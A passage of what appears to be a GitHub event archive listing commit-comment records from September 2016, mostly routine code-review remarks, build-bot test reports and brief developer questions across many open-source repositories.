      51254.24 |    89.9 |        20249 |          2.8 |        200.4\r\n```\r\n### Linux (4-way, gcd)\r\nSimilar improvement to epoll, around 5%\r\n```\r\nImplementation | Avg Throughput | Max Throughput | Avg CPU | Avg RSS (kb) | Avg Lat (ms) | Max Lat (ms)\r\n---------------|----------------|----------------|---------|--------------|--------------|--------------\r\n        0.32.0 |        34192.2 |       34791.62 |    72.7 |        25281 |          3.9 |        82.57\r\n        0.33.0 |        35000.5 |       36103.32 |    73.1 |        27135 |          3.8 |       203.05\r\n      0.33+682 |        36880.7 |       37517.62 |    73.0 |        25389 |          3.6 |        57.55\r\n```"}},"created_at":"2016-09-20T12:56:23Z"}
{"id":"4589457083","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19095650,"position":33,"line":64,"path":"src/raft.cpp","commit_id":"2db70b4b5ca1eae7443d305c0825338dd8a5be4b","created_at":"2016-09-20T12:56:44Z","updated_at":"2016-09-20T12:56:44Z","body":"It might be faster (and simpler code) to not check for rafts here and let the `getZdiffBetweenRaftAndLayer1` do the check. The double setting look-up is probably costlier than the extra round_divide."}},"created_at":"2016-09-20T12:56:44Z"}
{"id":"4589457908","type":"CommitCommentEvent","actor":{"login":"Teyras"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19095652,"position":18,"line":56,"path":"app/V1Module/security/Authorizator.php","commit_id":"bbdb6620a6957728e61c2a9f562854b338cecf12","created_at":"2016-09-20T12:56:52Z","updated_at":"2016-09-20T12:56:52Z","body":"Totally. I should've tried it before pushing."}},"created_at":"2016-09-20T12:56:52Z"}
{"id":"4589459301","type":"CommitCommentEvent","actor":{"login":"dkati"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19095655,"position":null,"line":null,"path":null,"commit_id":"f5f0eaf02314e8b51562ca40023d2ee01536c349","created_at":"2016-09-20T12:57:07Z","updated_at":"2016-09-20T12:57:07Z","body":"hey mate .\r\nwill all those \"alucard, darkness and nightmare cpu govs:\" commits work on s4 kernel too ?should i cherry pick em ?"}},"created_at":"2016-09-20T12:57:07Z"}
{"id":"4589464004","type":"CommitCommentEvent","actor":{"login":"yumetodo"},"repo":{"name":"m0bec/UNO"},"payload":{"comment":{"id":19095668,"position":null,"line":null,"path":null,"commit_id":"10293db2eb923bf1da4c406f6c579d36a951015a","created_at":"2016-09-20T12:58:00Z","updated_at":"2016-09-20T12:58:00Z","body":"いや、環境変数はそっち側のもんだいだろ、revertしてくれ"}},"created_at":"2016-09-20T12:58:00Z"}
{"id":"4589464407","type":"CommitCommentEvent","actor":{"login":"lrineau"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":19095670,"position":4,"line":132,"path":"Installation/changes.html","commit_id":"571659aaa32a30d7bfc0ce54a9d29c56079dca06","created_at":"2016-09-20T12:58:04Z","updated_at":"2016-09-20T12:58:04Z","body":"- For Intel Compiler, [CMake compiler features require 3.6](https://cmake.org/cmake/help/v3.6/release/3.6.html).\r\n "}},"created_at":"2016-09-20T12:58:04Z"}
{"id":"4589465398","type":"CommitCommentEvent","actor":{"login":"itelions"},"repo":{"name":"itelions/project_shasha"},"payload":{"comment":{"id":19095673,"position":126,"line":30,"path":"src/js/shop-car.js","commit_id":"35f87295d2d6ec92ee73e3ae79e9b296b67b3072","created_at":"2016-09-20T12:58:15Z","updated_at":"2016-09-20T12:58:15Z","body":"？？"}},"created_at":"2016-09-20T12:58:15Z"}
{"id":"4589467661","type":"CommitCommentEvent","actor":{"login":"Serg-Norseman"},"repo":{"name":"Serg-Norseman/CalendarConverter"},"payload":{"comment":{"id":19095681,"position":21,"line":220,"path":"CalendarConverterTests/UDNTests.cs","commit_id":"c27427ae830add3b739f7cfba1986a20f69e9a52","created_at":"2016-09-20T12:58:39Z","updated_at":"2016-09-20T12:58:39Z","body":"May be to do switcher in the UDN: FastIrreversible and SlowReversible? Bad variant, but..."}},"created_at":"2016-09-20T12:58:39Z"}
{"id":"4589472552","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19095689,"position":null,"line":null,"path":null,"commit_id":"95e0734be45527a370a645a00596b67aa1433429","created_at":"2016-09-20T12:59:35Z","updated_at":"2016-09-20T12:59:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1067](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13631&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 241, ignored: 3 Build time: 00:08:35"}},"created_at":"2016-09-20T12:59:35Z"}
{"id":"4589474658","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19095693,"position":13,"line":568,"path":"core/src/main/java/org/jruby/Ruby.java","commit_id":"1cc0d6a94cb13c46f0bc35bfcca8c000ead622dc","created_at":"2016-09-20T12:59:58Z","updated_at":"2016-09-20T12:59:58Z","body":"I made the control flow clearer in 8bb06f78d9d8d8d927207d088b9d2c18cd02e198"}},"created_at":"2016-09-20T12:59:58Z"}
{"id":"4589480250","type":"CommitCommentEvent","actor":{"login":"dziemba"},"repo":{"name":"ad2games/ad2games-theme"},"payload":{"comment":{"id":19095713,"position":5,"line":6,"path":"ad2games-theme.gemspec","commit_id":"de08d5bef03e6e42dfbf73e3728c90e93ed741cf","created_at":"2016-09-20T13:00:56Z","updated_at":"2016-09-20T13:00:56Z","body":"64 versions in one commit 😄 \r\n\r\nAs long as we don't publish this gem anyway, there's no need for version increments. But if we do versions, let's stick to semver."}},"created_at":"2016-09-20T13:00:56Z"}
{"id":"4589482010","type":"CommitCommentEvent","actor":{"login":"SemaiCZE"},"repo":{"name":"ReCodEx/api"},"payload":{"comment":{"id":19095720,"position":18,"line":56,"path":"app/V1Module/security/Authorizator.php","commit_id":"bbdb6620a6957728e61c2a9f562854b338cecf12","created_at":"2016-09-20T13:01:14Z","updated_at":"2016-09-20T13:01:14Z","body":"You definitely should have tested it ... it's second mistake already :)"}},"created_at":"2016-09-20T13:01:14Z"}
{"id":"4589495643","type":"CommitCommentEvent","actor":{"login":"yongjie917"},"repo":{"name":"yongjie917/ASWQL"},"payload":{"comment":{"id":19095752,"position":null,"line":null,"path":null,"commit_id":"d66aef550519a4335c6d7bd24495f4187f4c578d","created_at":"2016-09-20T13:03:38Z","updated_at":"2016-09-20T13:03:38Z","body":"[d]()"}},"created_at":"2016-09-20T13:03:38Z"}
{"id":"4589497309","type":"CommitCommentEvent","actor":{"login":"PicassoCT"},"repo":{"name":"spring/spring"},"payload":{"comment":{"id":19095755,"position":null,"line":null,"path":null,"commit_id":"39fe5c33cd1701d731f281c468bce1a72c0cbc0f","created_at":"2016-09-20T13:03:56Z","updated_at":"2016-09-20T13:03:56Z","body":"the crusade against the first LetterUpperCase  continus- "}},"created_at":"2016-09-20T13:03:56Z"}
{"id":"4589500022","type":"CommitCommentEvent","actor":{"login":"ZidCode"},"repo":{"name":"ZidCode/ibsen_eval"},"payload":{"comment":{"id":19095761,"position":null,"line":null,"path":null,"commit_id":"51bdfc49f43c4d6d482cf33c71624de2456e6a8a","created_at":"2016-09-20T13:04:26Z","updated_at":"2016-09-20T13:04:26Z","body":"Will be refactored ... just -wip- commit actually"}},"created_at":"2016-09-20T13:04:26Z"}
{"id":"4589500347","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19095763,"position":null,"line":null,"path":null,"commit_id":"056b267146b2368e483ebbe2caadd52fff6c1aa5","created_at":"2016-09-20T13:04:30Z","updated_at":"2016-09-20T13:04:30Z","body":"develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (2168 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.56%25-red.svg)</a> \n"}},"created_at":"2016-09-20T13:04:30Z"}
{"id":"4589501380","type":"CommitCommentEvent","actor":{"login":"ichrispa"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":19095765,"position":null,"line":null,"path":null,"commit_id":"08b19b00e3b9392f71dd76d249b84102e180aa37","created_at":"2016-09-20T13:04:42Z","updated_at":"2016-09-20T13:04:42Z","body":"@jpfr: Please check if this condition needs to be expanded to cover a more specific use-case. NS0 initializes of null-arrays with appropriate valueRank but no dimensions/values. This check would cause things like Servertype not to have say ServerArray's, as the type definition does not include values."}},"created_at":"2016-09-20T13:04:42Z"}
{"id":"4589502378","type":"CommitCommentEvent","actor":{"login":"Tellenn"},"repo":{"name":"Etanlink/HackingGameProject"},"payload":{"comment":{"id":19095769,"position":17,"line":17,"path":"src/xml/test.xml","commit_id":"769934fe1a2b789154d7fa6f4bd03d266cd0eeeb","created_at":"2016-09-20T13:04:52Z","updated_at":"2016-09-20T13:04:52Z","body":"deletion*"}},"created_at":"2016-09-20T13:04:52Z"}
{"id":"4589507498","type":"CommitCommentEvent","actor":{"login":"Tellenn"},"repo":{"name":"Etanlink/HackingGameProject"},"payload":{"comment":{"id":19095778,"position":4,"line":4,"path":"src/xml/test.xml","commit_id":"769934fe1a2b789154d7fa6f4bd03d266cd0eeeb","created_at":"2016-09-20T13:05:53Z","updated_at":"2016-09-20T13:05:53Z","body":"Other type will have to added, such as :\r\n- pc\r\n- server\r\n- global server (unique)\r\n...\r\n"}},"created_at":"2016-09-20T13:05:53Z"}
{"id":"4589509249","type":"CommitCommentEvent","actor":{"login":"Tellenn"},"repo":{"name":"Etanlink/HackingGameProject"},"payload":{"comment":{"id":19095781,"position":29,"line":29,"path":"src/xml/test.xml","commit_id":"769934fe1a2b789154d7fa6f4bd03d266cd0eeeb","created_at":"2016-09-20T13:06:13Z","updated_at":"2016-09-20T13:06:13Z","body":"This can be changed depending of the futur of the game"}},"created_at":"2016-09-20T13:06:13Z"}
{"id":"4589510738","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19095785,"position":null,"line":null,"path":null,"commit_id":"123f0b12d3e63e05df5d4d8c4ce5ab8b1582bd16","created_at":"2016-09-20T13:06:31Z","updated_at":"2016-09-20T13:06:31Z","body":"Initial commit"}},"created_at":"2016-09-20T13:06:31Z"}
{"id":"4589514003","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19095793,"position":null,"line":null,"path":null,"commit_id":"8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554","created_at":"2016-09-20T13:07:04Z","updated_at":"2016-09-20T13:07:04Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T13:07:04Z"}
{"id":"4589521672","type":"CommitCommentEvent","actor":{"login":"remitamine"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19095811,"position":null,"line":null,"path":null,"commit_id":"c38f06818df83f5f46cbdee1069bfaf53a537cc8","created_at":"2016-09-20T13:08:30Z","updated_at":"2016-09-20T13:08:30Z","body":"it will be supported in the next version:\r\n```\r\nyoutube-dl http://www.tbs.com/videos/the-big-bang-theory/season-4/episode-23/the-engagement-reaction.html\r\n[TBS] the-engagement-reaction: Downloading webpage\r\n[TBS] the-engagement-reaction: Downloading XML\r\n[TBS] 844286: Retrieving Media Token\r\n[TBS] 844286: Downloading XML\r\n[TBS] 844286: Downloading m3u8 information\r\n[TBS] 844286: Downloading m3u8 information\r\n[TBS] 844286: Downloading f4m manifest\r\nWARNING: Unable to download f4m manifest: HTTP Error 404: Not Found\r\n[hlsnative] Downloading m3u8 manifest\r\n[hlsnative] Total fragments: 120\r\n[download] Destination: The Big Bang Theory-844286.mp4\r\n[download]   0.8% of ~260.27MiB at 411.93KiB/s ETA 12:57\r\n```"}},"created_at":"2016-09-20T13:08:30Z"}
{"id":"4589524289","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19095816,"position":null,"line":null,"path":null,"commit_id":"3b70074de00491478ca32a2c24f4591e4409aea0","created_at":"2016-09-20T13:08:59Z","updated_at":"2016-09-20T13:08:59Z","body":"I am also a little bit dubitative about the un-initialized status of \"from\" in line 1045 in case min_attacker() returns KING: is it not a bug in your algorithm?"}},"created_at":"2016-09-20T13:08:59Z"}
{"id":"4589525545","type":"CommitCommentEvent","actor":{"login":"lrineau"},"repo":{"name":"CGAL/cgal"},"payload":{"comment":{"id":19095819,"position":4,"line":132,"path":"Installation/changes.html","commit_id":"571659aaa32a30d7bfc0ce54a9d29c56079dca06","created_at":"2016-09-20T13:09:13Z","updated_at":"2016-09-20T13:09:13Z","body":"- For g++ before 5, [CMake compile feature requires 3.2](https://cmake.org/cmake/help/v3.6/release/3.2.html).\r\n"}},"created_at":"2016-09-20T13:09:13Z"}
{"id":"4589525561","type":"CommitCommentEvent","actor":{"login":"cyfratech"},"repo":{"name":"cyfratech/hello-world"},"payload":{"comment":{"id":19095820,"position":null,"line":null,"path":null,"commit_id":"199f995376197a74120e15a2abc70aa8730cd782","created_at":"2016-09-20T13:09:15Z","updated_at":"2016-09-20T13:09:15Z","body":"OK"}},"created_at":"2016-09-20T13:09:15Z"}
{"id":"4589531444","type":"CommitCommentEvent","actor":{"login":"AlexeyDomnin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19095827,"position":18,"line":18,"path":"src/ru/sberbank/javaschool/hometask3/Task2.java","commit_id":"a0e3225cb5f13ed41557c61f38f6fa266061b149","created_at":"2016-09-20T13:10:19Z","updated_at":"2016-09-20T13:10:19Z","body":"@vzhilin ,\r\nа можно по подробнее о том, как можно упростить?\r\nПробовал разные вариации реализации без этой сложной структуры, но часто встречалась ситуация следующего рода:\r\nВ сете уже есть слова: [\"I\",\"to\",\"is\",\"am\"].\r\nИ когда на добавление приходит новое слово \"is\", то оно добавляется, несмотря на то, что оно уже есть в сете. И получался вот такой сет: [\"I\",\"to\",\"is\",\"am\",\"is\"].\r\nЭто происходило, потому что он как бы не успевал доходить до элемента \"is\", который уже есть в сете, поэтому добавлял его, и сортировал правильно.\r\nКогда ввел compareTo при одинаковой длине слова, то все стало работать нормально"}},"created_at":"2016-09-20T13:10:19Z"}
{"id":"4589532893","type":"CommitCommentEvent","actor":{"login":"wlpy"},"repo":{"name":"wlpy/mod-pbxproj"},"payload":{"comment":{"id":19095837,"position":null,"line":null,"path":null,"commit_id":"75b26d4f914e7931ae59132ec145d211dae5cf25","created_at":"2016-09-20T13:10:35Z","updated_at":"2016-09-20T13:10:35Z","body":"注意：本代码是在Unity导出xcode项目时，跟进pbxproj逆向后，编写用来mac命令行发版。已用与生产环境，但不保证通用性"}},"created_at":"2016-09-20T13:10:35Z"}
{"id":"4589537360","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095848,"position":4,"line":20,"path":"idea/src/org/jetbrains/kotlin/idea/refactoring/move/moveDeclarations/ui/MoveKotlinNestedClassesToUpperLevelDialog.java","commit_id":"9289bc053494239497c0148dd2fed569a6446ad6","created_at":"2016-09-20T13:11:22Z","updated_at":"2016-09-20T13:11:22Z","body":"I don't think it's the right class to use here. It has specific semantics and intended use, which don't apply in this case."}},"created_at":"2016-09-20T13:11:22Z"}
{"id":"4589538430","type":"CommitCommentEvent","actor":{"login":"mrinalpande"},"repo":{"name":"ProjectRecommend/docs"},"payload":{"comment":{"id":19095852,"position":null,"line":null,"path":null,"commit_id":"8ebe5826b3ae228de8ed32579138aa6669332dc5","created_at":"2016-09-20T13:11:34Z","updated_at":"2016-09-20T13:11:34Z","body":"@pranshu27 I don't think India will progress if you keep thinking like that. I think after the introduction of JIO your assumption will be false so convince me to use this product. \r\nFood for thought :D"}},"created_at":"2016-09-20T13:11:34Z"}
{"id":"4589545233","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_kv"},"payload":{"comment":{"id":19095868,"position":null,"line":null,"path":null,"commit_id":"515fe02ce64cf7c1d18a669206ff1021df67017f","created_at":"2016-09-20T13:12:46Z","updated_at":"2016-09-20T13:12:46Z","body":"saw approval from macintux\nat https://github.com/basho/riak_kv/commit/515fe02ce64cf7c1d18a669206ff1021df67017f"}},"created_at":"2016-09-20T13:12:46Z"}
{"id":"4589549992","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"WohlSoft/LunaLUA"},"payload":{"comment":{"id":19095880,"position":null,"line":null,"path":null,"commit_id":"3fb1086dd1e855ee7c00c40670d55ca55092c1d5","created_at":"2016-09-20T13:13:37Z","updated_at":"2016-09-20T13:13:37Z","body":"Please convert to spaces, thanks!"}},"created_at":"2016-09-20T13:13:37Z"}
{"id":"4589550933","type":"CommitCommentEvent","actor":{"login":"dgnzcn"},"repo":{"name":"neokoenig/jQuery-gridmanager"},"payload":{"comment":{"id":19095881,"position":null,"line":null,"path":null,"commit_id":"d3663d71fbb21e718c1f69a16ff9f54e51984f97","created_at":"2016-09-20T13:13:47Z","updated_at":"2016-09-20T13:13:47Z","body":"how can i include php files between <!--gm-editable-region--> here <!--gm-editable-region-->"}},"created_at":"2016-09-20T13:13:47Z"}
{"id":"4589552890","type":"CommitCommentEvent","actor":{"login":"AlexeyDomnin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19095884,"position":27,"line":27,"path":"src/ru/sberbank/javaschool/hometask3/Task4.java","commit_id":"a0e3225cb5f13ed41557c61f38f6fa266061b149","created_at":"2016-09-20T13:14:10Z","updated_at":"2016-09-20T13:14:10Z","body":"@vzhilin ,\r\nпереписал, сейчас закоммичу"}},"created_at":"2016-09-20T13:14:10Z"}
{"id":"4589553118","type":"CommitCommentEvent","actor":{"login":"yole"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":19095885,"position":30,"line":271,"path":"idea/src/org/jetbrains/kotlin/idea/intentions/MoveMemberToCompanionObjectIntention.kt","commit_id":"4e5e717902c46b926685d22f37caf4c81d57ea4f","created_at":"2016-09-20T13:14:11Z","updated_at":"2016-09-20T13:14:11Z","body":"I'd extract a method here. A large lambda used inside an `if` condition doesn't read well."}},"created_at":"2016-09-20T13:14:11Z"}
{"id":"4589557104","type":"CommitCommentEvent","actor":{"login":"niefnra"},"repo":{"name":"niefnra/TheWest"},"payload":{"comment":{"id":19095892,"position":null,"line":null,"path":null,"commit_id":"135358908ba8e7ab0f6a8384a6af418f03aafdb3","created_at":"2016-09-20T13:14:53Z","updated_at":"2016-09-20T13:14:53Z","body":"seseses"}},"created_at":"2016-09-20T13:14:53Z"}
{"id":"4589559187","type":"CommitCommentEvent","actor":{"login":"sum2012"},"repo":{"name":"sum2012/ppsspp"},"payload":{"comment":{"id":19095895,"position":48,"line":824,"path":"Core/Dialog/PSPOskDialog.cpp","commit_id":"dd3f4ac50e9baa478a00a2c516f6bba183cf8f34","created_at":"2016-09-20T13:15:15Z","updated_at":"2016-09-20T13:15:15Z","body":"oop,this is wrong"}},"created_at":"2016-09-20T13:15:15Z"}
{"id":"4589560473","type":"CommitCommentEvent","actor":{"login":"gtramontina"},"repo":{"name":"vvgomes/redux-todo"},"payload":{"comment":{"id":19095898,"position":82,"line":82,"path":"README.md","commit_id":"8576deb40ede36975e7f7d0e1d1e69bc6de5e207","created_at":"2016-09-20T13:15:27Z","updated_at":"2016-09-20T13:15:27Z","body":"When something goes _wrong_ … ? 😄 "}},"created_at":"2016-09-20T13:15:27Z"}
{"id":"4589561576","type":"CommitCommentEvent","actor":{"login":"Ramnew123"},"repo":{"name":"Ramnew123/tranning"},"payload":{"comment":{"id":19095901,"position":null,"line":null,"path":null,"commit_id":"a684f743987efa2f880941858056f005ea578e6d","created_at":"2016-09-20T13:15:40Z","updated_at":"2016-09-20T13:15:40Z","body":"please check and suggest me sir"}},"created_at":"2016-09-20T13:15:40Z"}
{"id":"4589564254","type":"CommitCommentEvent","actor":{"login":"1pushkar"},"repo":{"name":"pushprajnaik/mysite"},"payload":{"comment":{"id":19095906,"position":null,"line":null,"path":null,"commit_id":"d523e882466d9fd8773726efe6cf4156801c92d6","created_at":"2016-09-20T13:16:09Z","updated_at":"2016-09-20T13:16:09Z","body":"dekhne ki koshish to kr raha hu na bhacha\r\n"}},"created_at":"2016-09-20T13:16:09Z"}
{"id":"4589564572","type":"CommitCommentEvent","actor":{"login":"sawyernovak"},"repo":{"name":"uniform-team/Uniform-Validation-Language"},"payload":{"comment":{"id":19095907,"position":null,"line":null,"path":null,"commit_id":"5f4670843dd3c366770a04365a055a356d213976","created_at":"2016-09-20T13:16:11Z","updated_at":"2016-09-20T13:16:11Z","body":"Looks good. The only thing I'm worried about is the inability to compile using certain ES6 notations. Is that a separate ticket or should it be apart of this one?"}},"created_at":"2016-09-20T13:16:11Z"}
{"id":"4589565081","type":"CommitCommentEvent","actor":{"login":"gtramontina"},"repo":{"name":"vvgomes/redux-todo"},"payload":{"comment":{"id":19095908,"position":null,"line":null,"path":null,"commit_id":"8576deb40ede36975e7f7d0e1d1e69bc6de5e207","created_at":"2016-09-20T13:16:17Z","updated_at":"2016-09-20T13:16:17Z","body":"you've checked in `node_modules`… 😿 "}},"created_at":"2016-09-20T13:16:17Z"}
{"id":"4589566064","type":"CommitCommentEvent","actor":{"login":"AlexeyDomnin"},"repo":{"name":"AlexeyDomnin/SberRepo"},"payload":{"comment":{"id":19095913,"position":18,"line":18,"path":"src/ru/sberbank/javaschool/hometask3/Task6.java","commit_id":"a0e3225cb5f13ed41557c61f38f6fa266061b149","created_at":"2016-09-20T13:16:28Z","updated_at":"2016-09-20T13:16:28Z","body":"@vzhilin ,\r\nНе понял, как использовать информацию о средней длине строки?\r\nДля регулировки размера ArrayList'a?"}},"created_at":"2016-09-20T13:16:28Z"}
{"id":"4589566080","type":"CommitCommentEvent","actor":{"login":"muratcanbur"},"repo":{"name":"anadolubk/anadolubk-android"},"payload":{"comment":{"id":19095912,"position":33,"line":33,"path":"app/src/main/java/tr/edu/anadolu/bk/android/AnnouncementAdapter.java","commit_id":"9067ea5b3d1ecccd0a7a9ce3b0fcc2f1462334ce","created_at":"2016-09-20T13:16:28Z","updated_at":"2016-09-20T13:16:28Z","body":"gereksiz logları kaldıralım"}},"created_at":"2016-09-20T13:16:28Z"}
{"id":"4589569249","type":"CommitCommentEvent","actor":{"login":"loppear"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19095923,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:17:02Z","updated_at":"2016-09-20T13:17:02Z","body":"Think we should also set `templatePrefix` here, conditionally if \"Admin\" isn't already the start of `new.target.name`."}},"created_at":"2016-09-20T13:17:02Z"}
{"id":"4589571391","type":"CommitCommentEvent","actor":{"login":"zakaria24925"},"repo":{"name":"kamarush/android_device_lge_hammerhead"},"payload":{"comment":{"id":19095932,"position":null,"line":null,"path":null,"commit_id":"bbb0d1efd2ec15dec3e0c3eefe58b99708cb869b","created_at":"2016-09-20T13:17:24Z","updated_at":"2016-09-20T13:17:24Z","body":"how do i fix green lines in  google camera for nouvat rom ? help is needed please :-)"}},"created_at":"2016-09-20T13:17:24Z"}
{"id":"4589571675","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"WohlSoft/LunaLUA"},"payload":{"comment":{"id":19095935,"position":null,"line":null,"path":null,"commit_id":"3fb1086dd1e855ee7c00c40670d55ca55092c1d5","created_at":"2016-09-20T13:17:27Z","updated_at":"2016-09-20T13:17:27Z","body":"Oops (dumb notepad++)"}},"created_at":"2016-09-20T13:17:27Z"}
{"id":"4589571798","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19095936,"position":null,"line":null,"path":null,"commit_id":"8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554","created_at":"2016-09-20T13:17:29Z","updated_at":"2016-09-20T13:17:29Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8359918cc9c224d4fe2d0f8fcdc7d7aa18b62554-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-20T13:17:29Z"}
{"id":"4589573018","type":"CommitCommentEvent","actor":{"login":"yongjie917"},"repo":{"name":"easemob/easeui_ios"},"payload":{"comment":{"id":19095938,"position":null,"line":null,"path":null,"commit_id":"eb7ae6edfda7b71231fa6cb053a699b26dc604de","created_at":"2016-09-20T13:17:42Z","updated_at":"2016-09-20T13:17:42Z","body":"[yongjie@icloud.com]()"}},"created_at":"2016-09-20T13:17:42Z"}
{"id":"4589578236","type":"CommitCommentEvent","actor":{"login":"igorpecovnik"},"repo":{"name":"150balbes/lib"},"payload":{"comment":{"id":19095945,"position":null,"line":null,"path":null,"commit_id":"c9c653a4d742fcbfdbcf5f7a4a59360bc97d3297","created_at":"2016-09-20T13:18:40Z","updated_at":"2016-09-20T13:18:40Z","body":"This method fails on Debian Wheezy when boot is fat ... \r\n\r\n`/dev/root / ext4 rw,noatime,nodiratime,errors=remount-ro,commit=600 0 0`"}},"created_at":"2016-09-20T13:18:40Z"}
{"id":"4589583773","type":"CommitCommentEvent","actor":{"login":"thanhthuy89"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":19095952,"position":null,"line":null,"path":null,"commit_id":"bb12130b3135fc21f31bf639dc595ac6ca1addc6","created_at":"2016-09-20T13:19:40Z","updated_at":"2016-09-20T13:19:40Z","body":"I want skip setup wizard on cm13.0 !! please help me !"}},"created_at":"2016-09-20T13:19:40Z"}
{"id":"4589586087","type":"CommitCommentEvent","actor":{"login":"mjreich"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19095961,"position":9,"line":9,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:20:05Z","updated_at":"2016-09-20T13:20:05Z","body":"@loppear something like this?\r\n```javascript\r\nif(new.target.name.indexOf('admin') != 0) opts.templatePrefix = 'admin'\r\n```"}},"created_at":"2016-09-20T13:20:05Z"}
{"id":"4589590887","type":"CommitCommentEvent","actor":{"login":"dougsyer"},"repo":{"name":"zenoss/ZenPacks.zenoss.PythonCollector"},"payload":{"comment":{"id":19095975,"position":null,"line":null,"path":null,"commit_id":"eb1c5caef00ab0f6999c6153d35f262074485a5b","created_at":"2016-09-20T13:20:55Z","updated_at":"2016-09-20T13:20:55Z","body":"would be good to log an error on the hub here."}},"created_at":"2016-09-20T13:20:55Z"}
{"id":"4589591079","type":"CommitCommentEvent","actor":{"login":"12301068JiangDongyu"},"repo":{"name":"12301068JiangDongyu/Weather"},"payload":{"comment":{"id":19095977,"position":null,"line":null,"path":null,"commit_id":"cc0a71211ecc0695d6fd95df207330882a6ae24d","created_at":"2016-09-20T13:20:57Z","updated_at":"2016-09-20T13:20:57Z","body":"merge"}},"created_at":"2016-09-20T13:20:57Z"}
{"id":"4589595215","type":"CommitCommentEvent","actor":{"login":"ynnoj"},"repo":{"name":"moltin/js-sdk"},"payload":{"comment":{"id":19095988,"position":4,"line":3,"path":"README.md","commit_id":"1f18b1fa75f1571d7c47e1783625061217656316","created_at":"2016-09-20T13:21:40Z","updated_at":"2016-09-20T13:21:40Z","body":"@outrunthewolf I've created issues for each of these points under the [epic](https://github.com/moltin/workflow/issues/654)."}},"created_at":"2016-09-20T13:21:40Z"}
{"id":"4589595574","type":"CommitCommentEvent","actor":{"login":"loppear"},"repo":{"name":"nxus/admin"},"payload":{"comment":{"id":19095991,"position":8,"line":8,"path":"src/AdminController.js","commit_id":"6e9b430cdcd2d39afe67dbd3fcb4fe3581175508","created_at":"2016-09-20T13:21:44Z","updated_at":"2016-09-20T13:21:44Z","body":"So this should use `admin.getBaseUrl` (ala nxus-users), and therefore route registration will need to wait till after load in the parent class... But that also introduces a circular import unless AdminController moves to a sub-module. And I'm not totally happy with the sub-module import approach as in `web-nav` of `import {AdminController} from \"nxus-admin/lib/modules/admin-controller\"`."}},"created_at":"2016-09-20T13:21:44Z"}
